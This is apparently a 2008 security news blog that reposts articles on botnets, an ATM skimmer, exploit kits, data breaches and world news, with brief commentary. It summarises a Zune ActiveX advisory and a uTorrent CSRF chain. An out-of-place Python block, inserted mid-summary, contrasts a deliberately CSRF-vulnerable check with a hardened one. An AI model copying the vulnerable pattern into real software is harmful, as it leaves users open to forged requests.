BEIJING — China appeared to bend to international pressure on Friday as the government announced it would meet with envoys of the Dalai Lama, an unexpected shift that comes as violent Tibetan demonstrations in western China have threatened to cast a pall over the Beijing Olympics in August.

China’s announcement, made through the country’s official news agency, provided few details about the shape or substance of the talks but said the new discussions would commence “in the coming days.” The breakthrough comes as Chinese officials have pivoted this week and moved to tamp down the domestic nationalist anger unleashed by the Tibetan crisis and by the protests at the international Olympic torch relay.

“In view of the requests repeatedly made by the Dalai side for resuming talks, the relevant department of the central government will have contact and consultation with Dalai’s private representative in the coming days,” said an unidentified Chinese official, according to Xinhua, the official news agency.

The Dalai Lama, the exiled Tibetan spiritual leader, was returning to India from the United States on Friday. He has repeatedly called for renewed talks with Chinese officials and last month sent a letter to China’s president, Hu Jintao. Earlier this month, he hinted in Seattle that a back-channel discussion was already under way. On Friday, his spokesman, Tenzin Taklha, said: “Since His Holiness is committed to dialogue, we would welcome this.”

The spokesman added that the Dalai Lama had not yet received any official communication from China. “We also have to look at when the offer does officially arrive,” he said from Dharamshala, India, the seat of the Tibetan government-in-exile. “We have to look at conditions they are talking about.”

UN Probes US Syria Reactor Claim

Via BBC -

The UN's nuclear watchdog has said it will investigate US claims that Syria was building a secret nuclear reactor with North Korean help.

The International Atomic Energy Agency criticised the US for withholding its intelligence until seven months after Israel bombed the site.

The US said the alleged Syrian reactor "was not for peaceful purposes".

Syria has said the US claim is "ridiculous" and has denied any nuclear links to North Korea.

The site of the alleged reactor, said to be like one in North Korea, was bombed by Israel in 2007.

The director general of the UN's International Atomic Energy Agency (IAEA), Mohamed ElBaradei, has now been briefed by the US on their claims but "deplores" the delay, a statement from the agency said.

"The agency will treat this information with the seriousness it deserves and will investigate the veracity of the information," the statement said.

The agency was critical of both the US delay in releasing the information and of Israel's bombing of the site before the IAEA could inspect it.

"The director general views the unilateral use of force by Israel as undermining the due process of verification that is at the heart of the non-proliferation regime," the statement said.

The statement is a clear indication that Mr ElBaradei is not accepting the US claims at face value and wants his own first-hand information, says BBC diplomatic correspondent Bridget Kendall.

Syrian officials have said the site that was bombed by Israel on 6 September 2007 was an unused military facility under construction. Building on the site had stopped some time before the air strike, the Syrians said.

On Thursday, American security officials showed members of Congress evidence they said proved Syria was building a nuclear reactor with North Korean assistance.

Among the evidence they displayed were pictures - said to have been obtained by Israel - allegedly taken inside the facility showing the reactor core being built.

The images showed striking similarities between the Syrian facility and the North Korean reactor at Yongbyon, the US said.

China Now Has More Internet Users than Any Other Country

Via DailyTech -

Percentage of Chinese population using the Internet is lower than global average

China is one of the most heavily populated countries in the world, but it also has a large proportion of poor citizens without access to technology. As a result of the huge number of Chinese citizens, the number of internet users in China is growing rapidly.

The Chinese government commonly censors the Internet and has only recently begun allowing Chinese citizens to have access to English-language websites. According to numbers released from the Chinese Ministry of Information, China now has 221 million internet users. This number is up significantly from the end of 2007 when China reported 210 million internet users.

At the end of 2007 the U.S. had 205 million internet users. The Chinese Xinhua News Agency quoted the Chinese Information Ministry as saying, “Despite rapidly increasing the Internet population, the proportion of Internet users among the total population is still lower than the global average level.”

The global average for percentage of Internet users in a country is 19.1%; China only has an average of 16%. Chinese authorities expect to have 280 million internet users by the end of 2008.

The internet is an outlet for Chinese citizens to voice opinions in a country where traditional news media is strictly controlled. The lack of control over the internet compared to the control China exerts on other forms of media led Chinese President Hu Jintao to call for a purification of the internet in 2007.

-----------------------------

Yeah, I mean, what would happen if normal everyday citizens were allowed to have a voice and express it via the Internet? Chaos, that's what. Clearly.

Zune Software ActiveX Arbitrary File Overwrite Exploit

Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class

An arbitrary file overwrite has been discovered in an ActiveX control installed with the Zune software package.

If a user visits the malicious page and authorizes the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.

http://www.milw0rm.com/exploits/5489

Researchers Infiltrate and 'Pollute' Storm Botnet

Via DarkReading -

Sophisticated peer-to-peer (P2P) botnets like Storm that have no centralized command and control architecture have frustrated researchers because they're tough to dismantle. But a group of European researchers has come up with a way to disrupt these stealthy botnets -- by “polluting” them.

The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet’s P2P protocol to inject “polluted” content into the botnet to disrupt communication among the bots, as well as to study them more closely. The researchers tested their pollution method out on Storm -- and it worked. They presented their research this month at Usenix.

-------------------------

This is an awesome idea. But it won't be long until botnets are designed to protect their traffic a bit better - cat & mouse.

Trojan Horses Still Kicking After All These Years

Via Wired.com -

About 3,000 years ago Thursday, some Greeks left the people of Troy a wooden horse at the walled city’s front gate -- a free gift, no cost, no obligation from would-be invaders who wanted their adversaries to think they had left in peace.

Accepting the Trojan horse at face value turned out to be a big mistake.

Some things never change. In the 21st century Trojan horses are made of electronic "1s" and "0s" but are still left for you in all innocence and in plain sight: your e-mail inbox, in IMs and on a web page. But the intent, and the outcome, is pretty much the same: to pillage and steal.

The computer security industry describes computer Trojans as any program that purports to be one thing -- a screensaver or a .pdf file or a video codec -- but which actually conceals a malicious payload, like a password logger or pop-up advertising software.

One might be tempted to think we've gotten smarter in the three millennia since the Trojans ignored Cassandra's warning and accepted the first one. But when it comes to a propensity to fall for a deal that is too good to be true, humans have made little progress.

Or none whatsoever, if you believe computer-security guru Peter Neumann.

"People are still just as stupid now as they were then," says Neumann, the chief scientist at SRI's computer-security lab. "They see something shiny or a website that offers something for free and then they are dead."

But don’t expect technology to save you from yourself any time soon, Neumann warns.

-------------------------

Human: You are the weakest link. Goodbye.

Thieves Use Eee PC in Brazilian ATM scam

Via engadget.com -

Man, that tiny Eee PC can be used for just about anything: surfing the web, blogging, surreptitiously hiding inside an ATM machine and stealing your identity. You know, the usual stuff. Yeah, so three creative Brazilian thieves were recently caught stuffing a black Eee into an ATM, where it replaced the ordinary magical-money-making workings and instead stole unwitting customers' card numbers and PINs. The thieves didn't stop there, however -- they purposefully damaged all the other nearby ATMs so that theirs would be the only one in service. Clever! Of course, that doesn't explain why it was so easy to crack open the target ATM in the first place -- we'd pretty much consider our cash flow problems solved if we could pull that trick.

US Court Says IP Addresses Are Private

Via The Register UK -

A US court has ruled that users have a "reasonable expectation of privacy" in their internet surfing records and that police must obtain warrants from higher than usual courts in order to force ISPs to hand over records.

The Supreme Court of the state of New Jersey said that information about a person's use of the internet was so private that police there cannot order ISPs to release surfing details of suspects with a municipal court subpoena. They must receive a grand jury subpoena, it said.

"The court holds that citizens have a reasonable expectation of privacy in the subscriber information they provide to internet service providers," said the court's ruling. "Law enforcement officials can obtain subscriber information by serving a grand jury subpoena on an Internet service provider without notice to the subscriber."

Chief Justice Rabner said: "Individuals need an ISP address in order to access the internet. However, when users surf the web from the privacy of their homes, they have reason to expect that their actions are confidential. Many are unaware that a numerical IP address can be captured by the websites they visit. More sophisticated users understand that that unique string of numbers, standing alone, reveals little if anything to the outside world. Only an internet service provider can translate an IP address into a user’s name."

The case involved Shirley Reid, who was accused of hacking into her employer's computer system.

After Reid's ISP, Comcast, handed over details of her account, including the IP address from which she accessed the internet, she was found guilty of computer theft in connection with the hacking incident.

Reid overturned that decision on appeal and at the Supreme Court of New Jersey stage, arguing that the evidence should be suppressed.

Reid's lawyers had argued that a person should be informed when a subpoena is issued permitting the release of their telecommunications subscription details so that they can oppose the move. The Supreme Court of New Jersey, though, said that as long as the subpoena is from a grand jury the information can be released without the knowledge or consent of the user.

"Modern technology has raised a number of questions that are intertwined in this case: to what extent can private individuals 'surf' the 'web' anonymously? Do internet subscribers have a reasonable expectation of privacy in their identity while accessing internet websites? And under what circumstances may the State learn the actual identity of internet users?" said Chief Justice Rabner in his ruling.

"We decline to adopt a requirement that notice be provided to account holders whose information is subpoenaed," he said. "For obvious reasons, notice could impede and possibly defeat the grand jury’s investigation. Particularly in the case of computers, unscrupulous individuals aware of a subpoena could delete or damage files on their home computer and thereby effectively shield them from a legitimate investigation."

The court said that although Reid was successful in having the municipal warrant-obtained evidence suppressed, the police were not barred from approaching Comcast again and obtaining the records using an appropriate warrant.

Wednesday, April 23, 2008

Experts Warn of 'Tornado' Hacker Tool

Via vnunet.com -

Security researchers have discovered a new web-based attack tool which exploits up to 14 browser vulnerabilities and installs malware on the user's system.

Symantec researcher Liam O'Murchu said that 'Tornado' is commonly installed on a server by a single 'administrator', who then offers accounts on the server to other attackers.

The attackers then inject code into other web pages to redirect users to the Tornado server, where the exploit and malware installation is conducted.

"Perhaps this is why the code for this pack has stayed private for so long," said O'Murchu.

"Using this model, the creators of the pack can sell it to a few trusted customers at a higher price, rather than selling it to many untrustworthy customers and risking the code being released in the underground."

Tornado also offers attackers a full set of traffic statistics and options for selecting which exploits can be conducted.

The malware features an option to redirect repeat visitors to a phoney 'account suspended' page.

This helps the tool to evade security researchers who will make repeated visits to infected pages in order to study the exploits and malware in use.

Programs such as Neosploit and MPack offer similar capabilities to set up servers that can conduct multiple exploits against users.

IAEA Says Iran Agrees to Clarify Nuclear Activity

Via VOA News -

The International Atomic Energy Agency says Iran has agreed to cooperate in clarifying whether it has tried to develop nuclear weapons. From Paris, Lisa Bryant reports the Vienna-based IAEA hopes Tehran will provide the information in May.

News of Tehran's agreement to cooperate in clarifying whether or not it has been involved in nuclear-weapons development was provided in a brief statement by the IAEA. The IAEA considers the agreement a positive sign. It comes a day after Iran's government described talks with top IAEA investigator Oli Heinonen in Tehran as positive.

The United States and other western powers believe Iran is trying to build a nuclear weapon, but Tehran says its nuclear activities are for purely peaceful purposes - to generate energy.

---------------------

Talk about déjà vu....

US Scraps $20 Million Prototype of Virtual Fence

Via AP -

The government is scrapping a $20 million prototype of its highly touted "virtual fence" on the Arizona-Mexico border because the system is failing to adequately alert border patrol agents to illegal crossings, officials said.

The move comes just two months after Homeland Security Secretary Michael Chertoff announced his approval of the fence built by The Boeing Co. The fence consists of nine electronic surveillance towers along a 28-mile section of border southwest of Tucson.

Boeing is to replace the so-called Project 28 prototype with a series of towers equipped with communications systems, new cameras and new radar capability, officials said.

Less than a week after Chertoff accepted Project 28 on Feb. 22, the Government Accountability Office told Congress it "did not fully meet user needs and the project's design will not be used as the basis for future" developments.

A glaring shortcoming of the project was the time lag between the electronic detection of movement along the border and the transmission of a camera image to agents patrolling the area, the GAO reported.

Although the fence continues to operate, it hasn't come close to meeting the Border Patrol's goals, said Kelly Good, deputy director of the Secure Border Initiative program office in Washington.

"Probably not to the level that Border Patrol agents on the ground thought that they were going to get. So it didn't meet their expectations."

The Border Patrol had little input in designing the prototype but will have more say in the final version, officials said.

Microsoft to Remove Users' Rights From Defunct MSN Music Service

Via CNET News -

Microsoft handed plenty of ammunition to the anti-DRM crowd on Tuesday by announcing it will no longer furnish authorization keys for songs purchased from the defunct MSN Music service.

For former customers of MSN Music--the service Microsoft operated before closing it in late 2006 and opening Zune Marketplace--August 31 will be the last day that they can move music to different computers. After that, Microsoft will no longer "support the retrieval of license keys for the songs you purchased on MSN Music or the authorization of additional computers," the company said in an e-mail to former MSN Music customers.

It's important to note that the music won't disappear after the deadline. Songs will continue to play on authorized computers. What the announcement means is that former MSN Music customers will risk losing their music libraries if they try to transfer songs to unauthorized computers or swap operating systems after Aug. 31.

There are a couple of ways to safeguard the music but they aren't pretty. Before the deadline, those affected can move songs to computers they plan to own for a while (the songs can be authorized to play on five different PCs). Another alternative is to burn songs to CDs and rerip. This means the loss of sound quality but offers more peace of mind.

Bloggers pounced on the news, writing that the situation illustrated just how anti-consumer digital rights management is. The point most of them made: whatever hardware the songs are stored on will malfunction eventually, and the owner's music (in a high-quality form at least) will be gone forever.

"Ultimately, this serves as a reminder of what DRM really is," wrote Justin Mann at TechSpot.com. It's a "way for companies to control your use of their content. Rather than purchasing, you are renting."

-------------------

Lame...

Companies work very hard to hide customer-based DRM's true face, but once in a while...it comes shining through....in all its ugliness.

Tuesday, April 22, 2008

Google Searches that make you go hmm...

I'm going to take a stab and say that iPods are not allowed in classified areas according to Air Force Policy...but I could be wrong.

25th Anniversary of WarGames

Happy 25th Year!

WarGames on AMC, right now...and all this week.

Good ole TAB cola! lol

Microsoft Security Intelligence Report (SIR) - Volume 4

Via DarkReading.com -

Here’s another reason to hold onto your laptops: 57 percent of publicly disclosed security breaches came from lost or stolen equipment in the second half of last year, compared with only 13 percent from hacking and malware, according to Microsoft’s latest Security Intelligence Report, which was released today.

The new Microsoft report, which focuses on vulnerability and exploit data it gathered from July through December of 2007, found that exploits, malware, and hacks made up only 23 percent of security breach notifications between 2000 and 2007.

And the software giant recorded a whopping 300 percent jump in Trojan downloaders and droppers detected in the second half of ’07, as well as a curious 15 percent drop in the disclosure of new vulnerabilities. Overall, vulnerability disclosures decreased by 5 percent for all of 2007.

It was the decrease in vulnerability disclosures that most caught Microsoft by surprise, says Jimmy Kuo, principal architect of the Microsoft Malware Protection Center. “This is the first time since 2003 that there’s been such a decrease,” Kuo says.

The finding also surprised other security experts, including Doug Camplejohn, CEO of Mi5 Networks. But Camplejohn warns that one data point doesn’t make a trend. “It remains to be seen whether there's a true downward trend here, or whether vulnerability discoverers are just being more tight-lipped about vulnerabilities,” Camplejohn says.

All Your WoW Gold Belong to Us!

Via prevx.com -

In the last day or so we have had a massive influx of users coming to us because they are infected with a file called Chenzi.exe. After analyzing a sample in the lab here, all I can say is, this is pretty insane!

We started off with a clean machine with 56 running processes; after 10 minutes of running, we had ... 318 running processes. I tried to make a video of it, but the machine just couldn't handle it. This file is a downloader for many things at once, one being a password stealer for various online games. We've added detections for the entire cluster of files downloaded from all the downloaders we could get, so it would be worth a go trying to clean this up with Prevx CSI. I'd love to hear some feedback from anyone that's had this infection. Some signs of this infection are constant popups asking you to install Chinese language packs, popups for various Chinese websites, and your entire right-click menu changing from English to Chinese.

The main goal of this Trojan, however, is based around stealing WoW accounts. Let us know if you have any more info, or have been affected by this threat, as it seems rather prevalent at the moment.

In the meantime I'll try and get some video footage up of this infection.

Microsoft Gives Storm a Lashing

Via Computerworld -

Microsoft Corp. today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.

"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.

Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."

The bunch controlling the Storm botnet knew that it took Kuo's group several days to create new definitions for the MSRT, and that Microsoft held to a once-a-month release schedule for the tool. And they used that lag time and set schedule to their advantage.

"They knew that it takes [us] a week or more to create new definitions, and they were prepared to update their botnet immediately prior to MSRT releasing," he said, adding that the hackers would get a new version of the Trojan onto already-infected members of the Storm botnet to try to hold on to the machines after Windows had downloaded the newest version of the MSRT.

The idea was to preempt detection by swapping out the Storm bot already on the PC with a version less likely to be identified by the MSRT.

It didn't work, said Kuo. "They found out that even that was a losing battle," he said. "Even though they were able to maintain parts of their botnet, they knew they were in our gun sights. And ultimately they gave up."

According to Kuo, it was the hammering Microsoft gave the Storm botnet that sent the hackers packing.

In the last four months of 2007, the MSRT disinfected more than 526,000 PCs plagued by the Storm bot, he claimed. The bulk of those -- more than 291,000 -- were cleaned in September, when Microsoft first added Storm detection to the MSRT. In October, the number dipped to around 90,000, then bounced back to about 100,000 each month in November and December.

The front-loaded numbers, said Kuo, were typical, since the first month that the MSRT has a new malware definition, the tool cleanses all machines that have ever been infected. In the following months, it can only disinfect PCs that have been infected since the last release of the tool.

Storm, which first appeared in early 2007 -- and got the moniker because it was first disseminated in spam messages that claimed to have news of a massive series of winter storms that swept Europe -- has been linked to the Russian Business Network (RBN), a shadowy network of malware and hacker hosting services once based in St. Petersburg.

Others have confirmed Storm's decline, and credited Microsoft.

Earlier this month, Joe Stewart, the director of malware research at SecureWorks Inc., unveiled research on the world's top 11 botnets, and using SMTP "fingerprinting" and traffic extrapolations, estimated the size of each of those spam-sending botnets. Storm, said Stewart, was No. 5 on that list of 11 and likely controlled about 85,000 PCs -- a far cry from its height in 2007 and about one-fourth as many as the leading botnet, Srizbi.

"Storm is pretty insignificant at this point," Stewart said in an interview two weeks ago. "It got all this attention, so Microsoft added it to its malicious software detection tool [in September 2007], and that's removed hundreds of thousands of compromised PCs from the botnet."

But while Kuo was happy to take the credit on behalf of Microsoft for shrinking Storm, he was realistic about the overall impact.

"What we did was to drive them [the Storm bot herders] elsewhere," he said. "They're probably out there still making money with some other botnet."

Mac Hack Contest Bug Had Been Public for a Year

Via PC World -

When Charlie Miller won US$10,000 for hacking into a Macbook Air laptop last month, he exploited a flaw that had been publicly disclosed nearly a year before the contest.

The flaw, it turns out, lay in an open-source software library called the Perl Compatible Regular Expressions (PCRE) library, which is used by many products including Apache, the PHP scripting language, and Apple's Safari browser, which Miller hacked to win the contest.

Miller won $10,000 and a new Macbook Air last month after hacking into the laptop in a matter of minutes. The PWN2OWN contest invited hackers to try to install unauthorized software on fully patched Mac OS X, Windows and Linux computers using previously undisclosed "zero-day" flaws.

In an e-mail interview, security researcher Chris Evans said he found the bug, which he publicly disclosed in November 2007. PCRE developers fixed the bug months earlier while writing an incomplete fix for the issue in the May 2007 PCRE 6.7 product, Evans said.

Although Apple's Safari browser uses the PCRE software library, the company did not patch its version of the library until late last week. That means that an astute hacker who had noticed the fix in PCRE 6.7 would have been given an early tip on how to hack into Apple's computers.

Discovering a software bug is the first step toward figuring out how to use that flaw in an attack, but not every flaw leads to a successful exploit.

In an e-mail interview, Miller confirmed that the bug he'd exploited was the same one that was patched in PCRE 6.7, but said that researchers at his company, Independent Security Evaluators, had found it "completely independently."

Miller found another PCRE bug that allowed him to be the first hacker to break into the iPhone after it was launched last year.

It is very common for developers to incorporate someone else's software library into their program and then not properly add all the latest bug fixes, said Dragos Ruiu, one of the organizers of the PWN2OWN contest.

However, Apple should have done a better job of staying on top of the software it was shipping. "This is a black mark on their security team, but it's a common problem," he said. The same kind of issue has popped up frequently with products that use the zlib and JPEG compression libraries, he added.

An Apple representative could not immediately comment for this story, saying that he would have to first research the issue.

Ironically, Miller gave a presentation at the Black Hat security conference last year, arguing that one way to find bugs in Mac OS X would be to look for out-of-date open-source software that ships with the Mac and then to scan that project's files.

"I told Apple about this backporting problem then and they didn't listen and I didn't listen either, because we didn't find the bug by looking at changelogs, we found it with source code analysis," Miller said.

Although the focus of the PWN2OWN contest was on zero-day flaws, the fact that Miller exploited a flaw that was unpatched in Apple's products was enough to earn him the prize, conference organizers say.

That's a good thing, because when asked if he planned to return the prize money, Miller shot back the following: "No way. It's not my fault they don't fix their bugs."

----------------------------

This speaks for itself....but clearly, Apple failed to backport an open-source fix into their product. A year later, it is used for pure drive-by download pwnage in its browser.

I have been saying this for some time and so have many, many other security professionals. It is only a matter of time before this exact issue takes a bigger bite of Apple - unless they really crack down and get serious about working open source patches back into their products in a timely fashion.

LendingTree Discloses Insider Data Breach

Via NetworkWorld -

Web-based lending exchange LendingTree, which generates leads in the mortgage business by accepting online customer information, yesterday disclosed that it believes several former employees illicitly helped a handful of mortgage lenders gain access to customer data.

"Recently, LendingTree learned that several former employees may have helped a handful of mortgage lenders gain access to LendingTree's customer information by sharing confidential passwords with the lenders," LendingTree stated in a letter sent April 21 to its customers. "When we learned of this situation, we quickly contacted the authorities, and LendingTree is helping with the investigation. We promptly made several system-security changes. We also brought lawsuits against those involved."

LendingTree spokeswoman Allison Vail acknowledged the letter had been sent to customers, but declined to provide further details, such as how many customers would be affected.

LendingTree believes the lenders gained illicit entry to its data systems to access LendingTree’s loan-request forms between October 2006 and early 2008. The Charlotte, N.C.-based firm stated that the loan-request forms contained such customer data as name, address, e-mail address, telephone number, Social Security Number, income and employment information.

LendingTree said it is not aware of identity theft or fraudulent activity resulting from the breach.

Army Engineer Charged For Passing Secrets to Israel

Via AP -

A former U.S. Army mechanical engineer was arrested Tuesday on charges he slipped classified documents about nuclear weapons to an employee of the Israeli Consulate who also received information from convicted Pentagon spy Jonathan Pollard, authorities announced.

Ben-ami Kadish faces four counts of conspiracy, including allegations that he conspired to disclose U.S. national defense documents to Israel and that he acted as an agent of the Israeli government, U.S. Attorney Michael J. Garcia and FBI officials said.

A criminal complaint said the activities occurred from 1979 through 1985 while Kadish worked at the Army's Armament Research, Development and Engineering Center in Dover, N.J.

Kadish, a U.S. citizen, is accused of taking classified documents home several times and letting the Israeli government worker photograph them.

The documents included information about nuclear weapons, a modified version of an F-15 fighter jet, and the Patriot missile air defense system, the complaint said.

According to the complaint, the Israeli government worker on numerous occasions during 1979-1985 gave Kadish lists of U.S. national defense classified documents for Kadish to obtain.

The complaint said Kadish, born in Connecticut, was employed from October 1963 to January 1990 as a mechanical engineer at the Army's Picatinny Arsenal in Dover, where the research center is based.

The complaint said the Israeli worker, whose name was not given, is an Israeli citizen. It said that in the late 1970s, he was employed at Israeli Aircraft Industries in Israel, a defense manufacturing contractor for the Israeli government.

From July 1980 through November 1985, he was the consul for science affairs at the Israeli Consulate General in Manhattan, the complaint said.

There was no immediate response to calls seeking consulate comment Tuesday.

Al Qaeda Officially Hates The Counterterrorism Blog

Via CT Blog -

When I started this website in January 2005, I never envisioned that Al Qaeda would target us for a hit piece over the Internet. Well, voila, the blessed day has arrived. The wonderful folks at the SITE Intelligence Group found the item below on Al-Ekhlaas, one of Al-Qaida's central messaging forums on the Internet, which has begun a new series in English titled, "Watching and Monitoring the Jihad Media Watchers." They passed along the item below to Evan Kohlmann, who sent it to me, and I want to share it with our readers and contributors. They also passed out a "Badge of Honor" to SITE, Evan Kohlmann, IntelCenter, the NEFA Foundation, and Internet Haganah (my congrats to them).

-------------------

Check out the CT link above for the full details.

Kudos to every site named in this blog. I can say that I have been a reader of each of these sites for many years. They are all well maintained and very informative.

Wherever there are watchers...there will be watchers of those watchers. But who is watching the watchers of the watchers? That is the question. lol

British Police Use Facebook to Gather Evidence

Via CSOOnline -

The Greater Manchester Police force is looking for friends -- on Facebook.

It has created a Facebook application to collect leads for investigations, marking the first use of the social networking site by U.K. law enforcement.

The application delivers a real-time feed of police news and appeals for information. Next to that content is a feature to share a particular story with other friends in a person's network, as well as post comments.

One of the recent updates is an appeal asking for information about four men, one of whom was armed with an axe, who robbed a betting shop.

A "Submit Intelligence" link takes a Facebook user to the police Web site where they can anonymously submit tips. Another link leads to the videos on YouTube featuring information on the police force, ongoing investigations and other advisories.

One video contains closed-circuit TV footage of two men in hooded sweatshirts seen near the place where a 15-year-old, Jessie James, was shot and killed in Manchester in November 2006.

So far about 750 people have put the application on their profile, the police said. They estimate about seven million of the 59 million worldwide Facebook users live in the U.K.

The application has received a universally positive response. "Good thinking GMP [Greater Manchester Police]!" wrote Facebook user Sammie Jane. "This is a sure-fire way to branch out to the younger generation and also to encourage anonymous information."

New Tool Lets Enterprises Manage Security on Multiple Linux Servers

Via DarkReading -

The good news about open source security tools is that they're cheap and don't require much administration. The bad news about open source security tools is that they're cheap and don't require much administration.

That's the problem faced by many computing environments that use a large number of Linux servers. The security tools available in the open source environment are easy to procure, but they don't offer a central method of handling administration across multiple servers.

Trusted Computer Solutions Inc. tomorrow will attempt to jump into this void with the introduction of Security Blanket 2.0 Enterprise Edition, an automated "system lock down" and security management tool for Linux operating systems that can manage all local and remote Linux servers from a centralized Web-based management console.

The idea is to make it easier for larger Linux environments, such as government and educational organizations, to do the "hardening" process required to meet security compliance requirements, says Jamie Adams, senior developer at TCS.

"This will help organizations lock everything down to make assessors happy," Adams says. "It helps you figure out what needs to be configured, and then it helps you do the configuration. Then it helps you enforce the policy, making sure all of your servers are configured consistently and all the patches are up to date."

Currently, the primary open source tool for security administration is Bastille, but Bastille can't configure multiple servers from a central location and doesn't always meet current standards for compliance. "There's no commercial entity working on it," Adams observes. "You're not always getting updates right away."

The Enterprise version enables administrators to easily group Linux servers, associate a lockdown profile with a group of servers, scan all servers within a group to determine compliance, and configure the server operating systems to the lockdown level of the chosen profile.

Security Blanket 2.0 Enterprise includes the security guidelines recommended by the Center for Internet Security (CIS), the Defense Information Systems Agency (DISA) Security Technical Implementation Guides (STIGs), and select guidelines from the SANS Institute's defined risks associated with Linux. It lets administrators group servers, select one of these industry lockdown profiles (or build their own), assess the state of the servers against the profile, and then automatically configure the operating systems to meet those profile guidelines, TCS says.

Automation might increase organizations' interest in server hardening, which many still don't do, said Forrester Research in a report issued last year.

"Although server hardening is a well-established practice, only [45 percent] of interviewees harden all of their servers, and [26 percent] left some Internet-facing servers unhardened," Forrester said. "Why? Perhaps because they feel they can't spare the time -- today, [53 percent] of systems administrators harden their servers manually."

Security Blanket Enterprise Edition starts at $3,000 for a console that supports up to 100 servers. Server licenses start at $198 per server.

uTorrent CSRF Pwnage

Via xs-sniper.com -

A few weeks ago, Rob Carter told me about a few interesting CSRF vulnerabilities that he discovered in a uTorrent plugin (he publicly disclosed them this weekend). Rob was able to chain together the CSRF vulnerabilities and the net result is complete compromise of the victim's machine! I think this may be the first PURE CSRF vulnerability that I've seen that resulted in compromise of a victim's machine (there is an argument amongst some of my colleagues as to whether protocol handling/URI vulnerabilities are actually a form of CSRF, but that's another story). The series of vulnerabilities basically follow this flow:

When a user installs the uTorrent Web UI plugin, the plugin essentially starts a locally running web server on your machine (in order to serve the Web UI). Rob targets the CSRF vulnerabilities associated with this locally running web server.

Once the file is placed, the next time the user restarts their machine, the attacker-controlled file will be run… there you have it… compromise of a victim's system through three CSRFs! Scary stuff… you can read more about the issue on Rob's blog.
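The root of the flaw described above is a local web server that acts on any request arriving with the user's session, which is exactly what a browser supplies when a page on another origin auto-submits a form. The following is an added example written for this page, not code from uTorrent, its Web UI plugin or Rob Carter's write-up. It contrasts that cookie-only check with one that requires a per-session anti-forgery token and, when the browser sends one, a same-origin `Origin` header. The listen address, the `sid` cookie format and the form fields are constructed for illustration.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed values for this example: the address the local Web UI is assumed
# to listen on. They are not uTorrent's real endpoints or ports.
ALLOWED_ORIGINS = {"http://127.0.0.1:8080", "http://localhost:8080"}
# Methods that must never change server state and therefore need no token.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


class Session:
    """Server-side session state: the cookie value the browser will send
    automatically, plus a per-session anti-forgery token that only pages
    served from our own origin can read and echo back."""

    def __init__(self):
        self.cookie_id = secrets.token_urlsafe(16)
        self.csrf_token = secrets.token_urlsafe(32)


SESSIONS: Dict[str, Session] = {}


def login() -> Session:
    """Create a session, as the UI would after the user authenticates."""
    session = Session()
    SESSIONS[session.cookie_id] = session
    return session


def session_from_cookie(headers: dict) -> Optional[Session]:
    """Look up the session named by the 'sid' cookie (toy cookie format)."""
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sid":
            return SESSIONS.get(value)
    return None


def vulnerable_authorize(method: str, headers: dict, form: dict) -> bool:
    """The CSRF-prone pattern: any request carrying a valid session cookie is
    acted on. Browsers attach cookies to cross-site form posts too, so a page
    on another origin can drive the local server with the user's session."""
    return session_from_cookie(headers) is not None


def hardened_authorize(method: str, headers: dict, form: dict) -> Tuple[bool, str]:
    """Accept a state-changing request only if it proves it came from our own
    UI: same-origin (when the browser sends Origin) and carrying the token."""
    session = session_from_cookie(headers)
    if session is None:
        return False, "no session"
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-origin request"
    submitted = str(form.get("csrf_token", ""))
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"


def demo() -> dict:
    """Run a forged cross-site POST and a legitimate same-origin POST through
    both checks. The request shapes are constructed for this example."""
    session = login()
    cookie = {"Cookie": f"sid={session.cookie_id}"}
    # Forged: a form auto-submitted by a page on another origin. The browser
    # adds the cookie, but that page cannot read the session's token.
    forged_headers = {**cookie, "Origin": "http://evil.example"}
    forged_form = {"action": "change_setting"}
    # Legitimate: our own UI page echoes the token it was served.
    legit_headers = {**cookie, "Origin": "http://127.0.0.1:8080"}
    legit_form = {"action": "change_setting", "csrf_token": session.csrf_token}
    return {
        "vulnerable_accepts_forged": vulnerable_authorize("POST", forged_headers, forged_form),
        "hardened_accepts_forged": hardened_authorize("POST", forged_headers, forged_form)[0],
        "hardened_accepts_legit": hardened_authorize("POST", legit_headers, legit_form)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The token check is the load-bearing part: a page on another origin can make the browser send the cookie, but it cannot read the token that was embedded in a page served by the local UI, so it cannot complete a state-changing request. The `Origin` check is defence in depth for browsers that send the header, and the same-method rule keeps harmless GETs from becoming a side channel for the token.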

Google Searches that make you go hmm...

Legal notice to Jswiff? How is Oracle involved?...ummm

Either this is someone trying to find out how to defraud Coinstar machines, or someone conducting serious "research".

Looks like a group of "419" scammers is preparing a new e-mail focused around Glass Manufacturers.

Monday, April 21, 2008

Bringing Sexy Back to Indian Cricket

"Sexuality and cricket is the way forward. And it's time India wakes up to the fact that it's a different society. It's a modern society. There's no use keeping it all under wraps."

http://www.washingtonpost.com/wp-dyn/content/article/2008/04/18/AR2008041803577.html

------------------

Thanks to my friend, Kelli C., for the link.

A Good Student's 'Unexpected' Bomb Plot

Via ABC News -

